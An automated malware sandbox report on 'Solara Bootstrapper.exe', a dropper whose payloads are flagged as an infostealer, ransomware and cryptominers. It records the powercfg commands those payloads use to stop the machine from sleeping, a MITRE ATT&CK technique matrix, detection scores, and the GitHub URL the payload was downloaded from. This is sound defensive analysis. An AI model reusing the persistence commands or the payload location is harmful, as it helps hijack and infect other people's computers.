Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Windows\System32\conhost.exe

Code function: 2_2_0000019A49807960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_0000019A49807960

Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	1 Obfuscated Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	712 Process Injection	1 Timestomp	NTDS	22 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Rootkit	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	712 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Solara Bootstrapper.exe	68%	ReversingLabs	Win32.Dropper.Dapato
Solara Bootstrapper.exe	100%	Avira	TR/Dropper.Gen
Solara Bootstrapper.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\kx new.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\kx new.exe	100%	Joe Sandbox ML
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe	74%	ReversingLabs	Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Kawpow new.exe	74%	ReversingLabs	Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	33%	ReversingLabs	Win32.PUA.Packunwan
C:\Users\user\AppData\Local\Temp\kx new.exe	71%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\xmr new.exe	74%	ReversingLabs	Win64.Infostealer.Tinba

Name	IP	Active	Malicious	Antivirus Detection	Reputation
github.com	140.82.121.3	true	false		high
raw.githubusercontent.com	185.199.109.133	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt	false		high
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lBjq	powershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK	Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.109.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false
140.82.121.3	github.com	United States		36459	GITHUBUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585414
Start date and time:	2025-01-07 16:08:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
